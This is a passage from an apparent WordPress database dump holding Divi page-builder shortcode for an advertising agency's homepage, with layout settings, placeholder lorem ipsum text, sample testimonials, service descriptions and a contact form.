bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 20:13:46','2020-08-07 20:13:46','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(598,1,'2020-08-07 20:15:25','2020-08-07 20:15:25','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" 